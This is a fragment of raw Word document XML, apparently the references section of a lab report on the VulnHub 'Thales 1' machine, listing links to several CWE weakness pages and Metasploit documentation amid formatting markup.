            <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:color w:val="548dd4"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vertAlign w:val="baseline"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://cwe.mitre.org/data/definitions/307.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="548dd4"/>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-&gt; CWE 307 page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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hyperlink r:id="rId24">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:color w:val="548dd4"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vertAlign w:val="baseline"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://cwe.mitre.org/data/definitions/276.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="548dd4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>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-&gt; CWE 276 page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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hyperlink r:id="rId25">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:color w:val="548dd4"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vertAlign w:val="baseline"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://cwe.mitre.org/data/definitions/732.html</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-&gt; CWE 732 page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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hyperlink r:id="rId26">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:color w:val="548dd4"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vertAlign w:val="baseline"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://cwe.mitre.org/data/definitions/250.html</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-&gt; CWE 250 page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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hyperlink r:id="rId27">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:color w:val="548dd4"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vertAlign w:val="baseline"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://cwe.mitre.org/data/definitions/284.html</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-&gt; CWE 284 page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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hyperlink r:id="rId28">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:color w:val="548dd4"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vertAlign w:val="baseline"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.vulnhub.com/entry/thales-1,749/</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-&gt; Thales1 Vulnhub page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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hyperlink r:id="rId29">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:color w:val="548dd4"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vertAlign w:val="baseline"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://docs.metasploit.com</w:t>
        </w:r>
      </w:hyperlin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-&gt; Metasploit documentation</w:t>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pl"/>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13.0" w:type="dxa"/>
        <w:left w:w="70.0" w:type="dxa"/>
        <w:bottom w:w="0.0" w:type="dxa"/>
        <w:right w:w="70.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hyperlink" Target="https://cwe.mitre.org/data/definitions/521.html" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/276.html" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/307.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hyperlink" Target="https://cwe.mitre.org/data/definitions/250.html" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/732.html" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.vulnhub.com/entry/thales-1,749/" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/284.html"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ocs.metasploit.com" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><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11.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.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U70tsja5VYDBJk9K/NN7TvAXzg==">CgMxLjAyDmguNGtiMno3YjBzZ2o0Mg5oLnhhMmk1ZzZzYzdyYzIOaC5uYmIyeWJrY3R1YnQyDmgucXJ0bjh5NjM3NjdlMg5oLmN1NG9oczZ4MmdyODIOaC5jNWptdmV6M2RkZmoyDmgucTNjeGs3bjlkdjA1Mg5oLnJlcGIyY3NscjdieTIOaC5uYWtxN2MxM2FoNTEyDmguamhycnVvZHp4Mm1iMg5oLjg2NDAwZWJpeHQwNTINaC5kemF5dDZreDVlNTIOaC4xeXNieTBjN3c2dmsyDmgudHdrMzJhYTM4ZnNsMg5oLnE0Z2Z4dm5tMnRxazIOaC5vNXZ6eGs0OXlpcmcyDmguNXkyM2NwdWszejUwMg5oLnE4ZnozODJyM3VqMTgAciExTlk0R1pSN1BRc1NMZks3NGxLajhJSXc2d0czeW9OdV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